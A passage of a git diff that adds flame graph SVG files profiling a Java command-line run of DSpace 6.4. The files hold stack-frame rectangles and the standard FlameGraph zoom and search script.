+<g >
+<title>switch_fpu_return (1 samples, 0.23%)</title><rect x="291.6" y="741" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="294.59" y="751.5" ></text>
+</g>
+<g >
+<title>__schedule (18 samples, 4.09%)</title><rect x="12.7" y="677" width="48.3" height="15.0" fill="rgb(212,67,67)" rx="2" ry="2" />
+<text  x="15.68" y="687.5" >__sc..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.45%)</title><rect x="978.1" y="149" width="5.4" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="981.14" y="159.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="956.7" y="421" width="2.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="959.68" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="798.5" y="421" width="2.6" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="801.45" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.23%)</title><rect x="903.0" y="405" width="2.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="906.05" y="415.5" ></text>
+</g>
+<g >
+<title>blk_mq_end_request (1 samples, 0.23%)</title><rect x="484.7" y="581" width="2.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="487.68" y="591.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (16 samples, 3.64%)</title><rect x="248.7" y="645" width="42.9" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="251.68" y="655.5" >__pe..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.23%)</title><rect x="1144.4" y="197" width="2.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="1147.41" y="207.5" ></text>
+</g>
+<g >
+<title>update_load_avg.constprop.0 (1 samples, 0.23%)</title><rect x="12.7" y="629" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="15.68" y="639.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="345.2" y="725" width="5.4" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="348.23" y="735.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="1128.3" y="181" width="2.7" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="1131.32" y="191.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%)</title><rect x="978.1" y="133" width="5.4" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="981.14" y="143.5" ></text>
+</g>
+<g >
+<title>java/lang/StackTraceElement:::toString (1 samples, 0.23%)</title><rect x="680.5" y="293" width="2.6" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="683.45" y="303.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.23%)</title><rect x="854.8" y="357" width="2.7" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="857.77" y="367.5" ></text>
+</g>
+<g >
+<title>update_curr (1 samples, 0.23%)</title><rect x="701.9" y="197" width="2.7" height="15.0" fill="rgb(241,109,109)" rx="2" ry="2" />
+<text  x="704.91" y="207.5" ></text>
+</g>
+<g >
+<title>nf_nat_ipv4_local_fn (1 samples, 0.23%)</title><rect x="581.2" y="581" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="584.23" y="591.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (10 samples, 2.27%)</title><rect x="1082.7" y="437" width="26.8" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="1085.73" y="447.5" >o..</text>
+</g>
+<g >
+<title>java/util/Properties:::getProperty (1 samples, 0.23%)</title><rect x="1090.8" y="277" width="2.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="1093.77" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="245" width="2.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="176.59" y="255.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Proxy$Key1:::equals (1 samples, 0.23%)</title><rect x="755.5" y="389" width="2.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="758.55" y="399.5" ></text>
+</g>
+<g >
+<title>__send (47 samples, 10.68%)</title><rect x="541.0" y="805" width="126.0" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="544.00" y="815.5" >__send</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (28 samples, 6.36%)</title><rect x="970.1" y="421" width="75.1" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="973.09" y="431.5" >org/spri..</text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.23%)</title><rect x="1090.8" y="309" width="2.7" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="1093.77" y="319.5" ></text>
+</g>
+<g >
+<title>schedule (13 samples, 2.95%)</title><rect x="310.4" y="693" width="34.8" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="313.36" y="703.5" >sc..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="261" width="2.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="1174.23" y="271.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::group0 (2 samples, 0.45%)</title><rect x="988.9" y="261" width="5.3" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="991.86" y="271.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (4 samples, 0.91%)</title><rect x="130.7" y="789" width="10.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="133.68" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::sequence (1 samples, 0.23%)</title><rect x="991.5" y="245" width="2.7" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="994.55" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractMessageWriter:::write (1 samples, 0.23%)</title><rect x="1093.5" y="357" width="2.6" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1096.45" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::getBrowseIndices (6 samples, 1.36%)</title><rect x="978.1" y="325" width="16.1" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="981.14" y="335.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.23%)</title><rect x="1106.9" y="277" width="2.6" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="1109.86" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="309" width="5.4" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1144.73" y="319.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService:::addConverterFactory (1 samples, 0.23%)</title><rect x="857.5" y="373" width="2.6" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="860.45" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/Date:::toString (1 samples, 0.23%)</title><rect x="667.0" y="437" width="2.7" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="670.05" y="447.5" ></text>
+</g>
+<g >
+<title>__check_object_size (1 samples, 0.23%)</title><rect x="538.3" y="661" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="541.32" y="671.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::init (2 samples, 0.45%)</title><rect x="1168.5" y="469" width="5.4" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1171.55" y="479.5" ></text>
+</g>
+<g >
+<title>__schedule (12 samples, 2.73%)</title><rect x="310.4" y="677" width="32.1" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="313.36" y="687.5" >__..</text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::&lt;init&gt; (6 samples, 1.36%)</title><rect x="978.1" y="309" width="16.1" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="981.14" y="319.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (25 samples, 5.68%)</title><rect x="63.6" y="757" width="67.1" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="66.64" y="767.5" >do_sysc..</text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="61.0" y="661" width="2.6" height="15.0" fill="rgb(206,58,58)" rx="2" ry="2" />
+<text  x="63.95" y="671.5" ></text>
+</g>
+<g >
+<title>change_protection (1 samples, 0.23%)</title><rect x="347.9" y="613" width="2.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="350.91" y="623.5" ></text>
+</g>
+<g >
+<title>futex_wait (17 samples, 3.86%)</title><rect x="246.0" y="725" width="45.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="249.00" y="735.5" >fute..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (3 samples, 0.68%)</title><rect x="1029.1" y="373" width="8.0" height="15.0" fill="rgb(56,205,56)" rx="2" ry="2" />
+<text  x="1032.09" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (2 samples, 0.45%)</title><rect x="978.1" y="245" width="5.4" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="981.14" y="255.5" ></text>
+</g>
+<g >
+<title>__schedule (1 samples, 0.23%)</title><rect x="1101.5" y="197" width="2.7" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="1104.50" y="207.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.68%)</title><rect x="908.4" y="421" width="8.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="911.41" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (5 samples, 1.14%)</title><rect x="860.1" y="309" width="13.4" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="863.14" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getBundles (4 samples, 0.91%)</title><rect x="932.5" y="453" width="10.8" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="935.55" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="245" width="2.7" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="1174.23" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.23%)</title><rect x="913.8" y="389" width="2.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="916.77" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="789" width="2.7" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="219.50" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="741" width="2.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="63.95" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="261" width="2.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="176.59" y="271.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_established (6 samples, 1.36%)</title><rect x="608.0" y="389" width="16.1" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="611.05" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::compile (4 samples, 0.91%)</title><rect x="983.5" y="293" width="10.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="986.50" y="303.5" ></text>
+</g>
+<g >
+<title>nf_nat_inet_fn (1 samples, 0.23%)</title><rect x="581.2" y="565" width="2.7" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="584.23" y="575.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="192.4" y="773" width="2.6" height="15.0" fill="rgb(211,67,67)" rx="2" ry="2" />
+<text  x="195.36" y="783.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (1 samples, 0.23%)</title><rect x="578.5" y="581" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="581.55" y="591.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.45%)</title><rect x="1098.8" y="373" width="5.4" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="1101.82" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="341" width="2.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="176.59" y="351.5" ></text>
+</g>
+<g >
+<title>native_write_msr (4 samples, 0.91%)</title><rect x="130.7" y="613" width="10.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="133.68" y="623.5" ></text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.23%)</title><rect x="701.9" y="245" width="2.7" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="704.91" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (11 samples, 2.50%)</title><rect x="157.5" y="629" width="29.5" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="160.50" y="639.5" >[l..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (48 samples, 10.91%)</title><rect x="353.3" y="709" width="128.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="356.27" y="719.5" >futex_wait_queue..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="517" width="5.4" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="173.91" y="527.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.23%)</title><rect x="980.8" y="37" width="2.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="983.82" y="47.5" ></text>
+</g>
+<g >
+<title>schedule (25 samples, 5.68%)</title><rect x="63.6" y="693" width="67.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="66.64" y="703.5" >schedule</text>
+</g>
+<g >
+<title>futex_wait_queue_me (16 samples, 3.64%)</title><rect x="248.7" y="709" width="42.9" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="251.68" y="719.5" >fute..</text>
+</g>
+<g >
+<title>do_syscall_64 (48 samples, 10.91%)</title><rect x="353.3" y="757" width="128.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="356.27" y="767.5" >do_syscall_64</text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%)</title><rect x="935.2" y="341" width="2.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="938.23" y="351.5" ></text>
+</g>
+</g>
+</svg>
diff --git a/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg b/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg
new file mode 100644
index 000000000..1d7b64546
--- /dev/null
+++ b/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg
@@ -0,0 +1,4540 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" width="1200" height="998" onload="init(evt)" viewBox="0 0 1200 998" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<!-- Flame graph stack visualization. See https://github.com/brendangregg/FlameGraph for latest version, and http://www.brendangregg.com/flamegraphs.html for examples. -->
+<!-- NOTES:  -->
+<defs>
+	<linearGradient id="background" y1="0" y2="1" x1="0" x2="0" >
+		<stop stop-color="#eeeeee" offset="5%" />
+		<stop stop-color="#eeeeb0" offset="95%" />
+	</linearGradient>
+</defs>
+<style type="text/css">
+	text { font-family:Verdana; font-size:12px; fill:rgb(0,0,0); }
+	#search, #ignorecase { opacity:0.1; cursor:pointer; }
+	#search:hover, #search.show, #ignorecase:hover, #ignorecase.show { opacity:1; }
+	#subtitle { text-anchor:middle; font-color:rgb(160,160,160); }
+	#title { text-anchor:middle; font-size:17px}
+	#unzoom { cursor:pointer; }
+	#frames > *:hover { stroke:black; stroke-width:0.5; cursor:pointer; }
+	.hide { display:none; }
+	.parent { opacity:0.5; }
+</style>
+<script type="text/ecmascript">
+<![CDATA[
+	"use strict";
+	var details, searchbtn, unzoombtn, matchedtxt, svg, searching, currentSearchTerm, ignorecase, ignorecaseBtn;
+	function init(evt) {
+		details = document.getElementById("details").firstChild;
+		searchbtn = document.getElementById("search");
+		ignorecaseBtn = document.getElementById("ignorecase");
+		unzoombtn = document.getElementById("unzoom");
+		matchedtxt = document.getElementById("matched");
+		svg = document.getElementsByTagName("svg")[0];
+		searching = 0;
+		currentSearchTerm = null;
+	}
+
+	window.addEventListener("click", function(e) {
+		var target = find_group(e.target);
+		if (target) {
+			if (target.nodeName == "a") {
+				if (e.ctrlKey === false) return;
+				e.preventDefault();
+			}
+			if (target.classList.contains("parent")) unzoom();
+			zoom(target);
+		}
+		else if (e.target.id == "unzoom") unzoom();
+		else if (e.target.id == "search") search_prompt();
+		else if (e.target.id == "ignorecase") toggle_ignorecase();
+	}, false)
+
+	// mouse-over for info
+	// show
+	window.addEventListener("mouseover", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = "Function: " + g_to_text(target);
+	}, false)
+
+	// clear
+	window.addEventListener("mouseout", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = ' ';
+	}, false)
+
+	// ctrl-F for search
+	window.addEventListener("keydown",function (e) {
+		if (e.keyCode === 114 || (e.ctrlKey && e.keyCode === 70)) {
+			e.preventDefault();
+			search_prompt();
+		}
+	}, false)
+
+	// ctrl-I to toggle case-sensitive search
+	window.addEventListener("keydown",function (e) {
+		if (e.ctrlKey && e.keyCode === 73) {
+			e.preventDefault();
+			toggle_ignorecase();
+		}
+	}, false)
+
+	// functions
+	function find_child(node, selector) {
+		var children = node.querySelectorAll(selector);
+		if (children.length) return children[0];
+		return;
+	}
+	function find_group(node) {
+		var parent = node.parentElement;
+		if (!parent) return;
+		if (parent.id == "frames") return node;
+		return find_group(parent);
+	}
+	function orig_save(e, attr, val) {
+		if (e.attributes["_orig_" + attr] != undefined) return;
+		if (e.attributes[attr] == undefined) return;
+		if (val == undefined) val = e.attributes[attr].value;
+		e.setAttribute("_orig_" + attr, val);
+	}
+	function orig_load(e, attr) {
+		if (e.attributes["_orig_"+attr] == undefined) return;
+		e.attributes[attr].value = e.attributes["_orig_" + attr].value;
+		e.removeAttribute("_orig_"+attr);
+	}
+	function g_to_text(e) {
+		var text = find_child(e, "title").firstChild.nodeValue;
+		return (text)
+	}
+	function g_to_func(e) {
+		var func = g_to_text(e);
+		// if there's any manipulation we want to do to the function
+		// name before it's searched, do it here before returning.
+		return (func);
+	}
+	function update_text(e) {
+		var r = find_child(e, "rect");
+		var t = find_child(e, "text");
+		var w = parseFloat(r.attributes.width.value) -3;
+		var txt = find_child(e, "title").textContent.replace(/\([^(]*\)$/,"");
+		t.attributes.x.value = parseFloat(r.attributes.x.value) + 3;
+
+		// Smaller than this size won't fit anything
+		if (w < 2 * 12 * 0.59) {
+			t.textContent = "";
+			return;
+		}
+
+		t.textContent = txt;
+		// Fit in full text width
+		if (/^ *$/.test(txt) || t.getSubStringLength(0, txt.length) < w)
+			return;
+
+		for (var x = txt.length - 2; x > 0; x--) {
+			if (t.getSubStringLength(0, x + 2) <= w) {
+				t.textContent = txt.substring(0, x) + "..";
+				return;
+			}
+		}
+		t.textContent = "";
+	}
+
+	// zoom
+	function zoom_reset(e) {
+		if (e.attributes != undefined) {
+			orig_load(e, "x");
+			orig_load(e, "width");
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_reset(c[i]);
+		}
+	}
+	function zoom_child(e, x, ratio) {
+		if (e.attributes != undefined) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = (parseFloat(e.attributes.x.value) - x - 10) * ratio + 10;
+				if (e.tagName == "text")
+					e.attributes.x.value = find_child(e.parentNode, "rect[x]").attributes.x.value + 3;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseFloat(e.attributes.width.value) * ratio;
+			}
+		}
+
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_child(c[i], x - 10, ratio);
+		}
+	}
+	function zoom_parent(e) {
+		if (e.attributes) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = 10;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseInt(svg.width.baseVal.value) - (10 * 2);
+			}
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_parent(c[i]);
+		}
+	}
+	function zoom(node) {
+		var attr = find_child(node, "rect").attributes;
+		var width = parseFloat(attr.width.value);
+		var xmin = parseFloat(attr.x.value);
+		var xmax = parseFloat(xmin + width);
+		var ymin = parseFloat(attr.y.value);
+		var ratio = (svg.width.baseVal.value - 2 * 10) / width;
+
+		// XXX: Workaround for JavaScript float issues (fix me)
+		var fudge = 0.0001;
+
+		unzoombtn.classList.remove("hide");
+
+		var el = document.getElementById("frames").children;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var a = find_child(e, "rect").attributes;
+			var ex = parseFloat(a.x.value);
+			var ew = parseFloat(a.width.value);
+			var upstack;
+			// Is it an ancestor
+			if (0 == 0) {
+				upstack = parseFloat(a.y.value) > ymin;
+			} else {
+				upstack = parseFloat(a.y.value) < ymin;
+			}
+			if (upstack) {
+				// Direct ancestor
+				if (ex <= xmin && (ex+ew+fudge) >= xmax) {
+					e.classList.add("parent");
+					zoom_parent(e);
+					update_text(e);
+				}
+				// not in current path
+				else
+					e.classList.add("hide");
+			}
+			// Children maybe
+			else {
+				// no common path
+				if (ex < xmin || ex + fudge >= xmax) {
+					e.classList.add("hide");
+				}
+				else {
+					zoom_child(e, xmin, ratio);
+					update_text(e);
+				}
+			}
+		}
+		search();
+	}
+	function unzoom() {
+		unzoombtn.classList.add("hide");
+		var el = document.getElementById("frames").children;
+		for(var i = 0; i < el.length; i++) {
+			el[i].classList.remove("parent");
+			el[i].classList.remove("hide");
+			zoom_reset(el[i]);
+			update_text(el[i]);
+		}
+		search();
+	}
+
+	// search
+	function toggle_ignorecase() {
+		ignorecase = !ignorecase;
+		if (ignorecase) {
+			ignorecaseBtn.classList.add("show");
+		} else {
+			ignorecaseBtn.classList.remove("show");
+		}
+		reset_search();
+		search();
+	}
+	function reset_search() {
+		var el = document.querySelectorAll("#frames rect");
+		for (var i = 0; i < el.length; i++) {
+			orig_load(el[i], "fill")
+		}
+	}
+	function search_prompt() {
+		if (!searching) {
+			var term = prompt("Enter a search term (regexp " +
+			    "allowed, eg: ^ext4_)"
+			    + (ignorecase ? ", ignoring case" : "")
+			    + "\nPress Ctrl-i to toggle case sensitivity", "");
+			if (term != null) {
+				currentSearchTerm = term;
+				search();
+			}
+		} else {
+			reset_search();
+			searching = 0;
+			currentSearchTerm = null;
+			searchbtn.classList.remove("show");
+			searchbtn.firstChild.nodeValue = "Search"
+			matchedtxt.classList.add("hide");
+			matchedtxt.firstChild.nodeValue = ""
+		}
+	}
+	function search(term) {
+		if (currentSearchTerm === null) return;
+		var term = currentSearchTerm;
+
+		var re = new RegExp(term, ignorecase ? 'i' : '');
+		var el = document.getElementById("frames").children;
+		var matches = new Object();
+		var maxwidth = 0;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var func = g_to_func(e);
+			var rect = find_child(e, "rect");
+			if (func == null || rect == null)
+				continue;
+
+			// Save max width. Only works as we have a root frame
+			var w = parseFloat(rect.attributes.width.value);
+			if (w > maxwidth)
+				maxwidth = w;
+
+			if (func.match(re)) {
+				// highlight
+				var x = parseFloat(rect.attributes.x.value);
+				orig_save(rect, "fill");
+				rect.attributes.fill.value = "rgb(230,0,230)";
+
+				// remember matches
+				if (matches[x] == undefined) {
+					matches[x] = w;
+				} else {
+					if (w > matches[x]) {
+						// overwrite with parent
+						matches[x] = w;
+					}
+				}
+				searching = 1;
+			}
+		}
+		if (!searching)
+			return;
+
+		searchbtn.classList.add("show");
+		searchbtn.firstChild.nodeValue = "Reset Search";
+
+		// calculate percent matched, excluding vertical overlap
+		var count = 0;
+		var lastx = -1;
+		var lastw = 0;
+		var keys = Array();
+		for (k in matches) {
+			if (matches.hasOwnProperty(k))
+				keys.push(k);
+		}
+		// sort the matched frames by their x location
+		// ascending, then width descending
+		keys.sort(function(a, b){
+			return a - b;
+		});
+		// Step through frames saving only the biggest bottom-up frames
+		// thanks to the sort order. This relies on the tree property
+		// where children are always smaller than their parents.
+		var fudge = 0.0001;	// JavaScript floating point
+		for (var k in keys) {
+			var x = parseFloat(keys[k]);
+			var w = matches[keys[k]];
+			if (x >= lastx + lastw - fudge) {
+				count += w;
+				lastx = x;
+				lastw = w;
+			}
+		}
+		// display matched percent
+		matchedtxt.classList.remove("hide");
+		var pct = 100 * count / maxwidth;
+		if (pct != 100) pct = pct.toFixed(1)
+		matchedtxt.firstChild.nodeValue = "Matched: " + pct + "%";
+	}
+]]>
+</script>
+<rect x="0.0" y="0" width="1200.0" height="998.0" fill="url(#background)"  />
+<text id="title" x="600.00" y="24" >Flame Graph</text>
+<text id="details" x="10.00" y="981" > </text>
+<text id="unzoom" x="10.00" y="24" class="hide">Reset Zoom</text>
+<text id="search" x="1090.00" y="24" >Search</text>
+<text id="ignorecase" x="1174.00" y="24" >ic</text>
+<text id="matched" x="1090.00" y="981" > </text>
+<g id="frames">
+<g >
+<title>[libjvm.so] (77 samples, 11.39%)</title><rect x="109.5" y="789" width="134.4" height="15.0" fill="rgb(206,58,58)" rx="2" ry="2" />
+<text  x="112.50" y="799.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="359.1" y="853" width="5.2" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="362.11" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.15%)</title><rect x="1158.6" y="549" width="1.7" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="1161.58" y="559.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList:::iterator (1 samples, 0.15%)</title><rect x="565.1" y="437" width="1.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="568.09" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%)</title><rect x="1139.4" y="421" width="1.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1142.38" y="431.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (6 samples, 0.89%)</title><rect x="511.0" y="661" width="10.4" height="15.0" fill="rgb(215,73,73)" rx="2" ry="2" />
+<text  x="513.98" y="671.5" ></text>
+</g>
+<g >
+<title>__poll (4 samples, 0.59%)</title><rect x="1169.1" y="357" width="6.9" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="1172.05" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (2 samples, 0.30%)</title><rect x="961.3" y="469" width="3.5" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="964.33" y="479.5" ></text>
+</g>
+<g >
+<title>Reference_Handl (11 samples, 1.63%)</title><rect x="271.8" y="933" width="19.2" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="274.83" y="943.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (7 samples, 1.04%)</title><rect x="919.4" y="549" width="12.3" height="15.0" fill="rgb(87,233,87)" rx="2" ry="2" />
+<text  x="922.44" y="559.5" ></text>
+</g>
+<g >
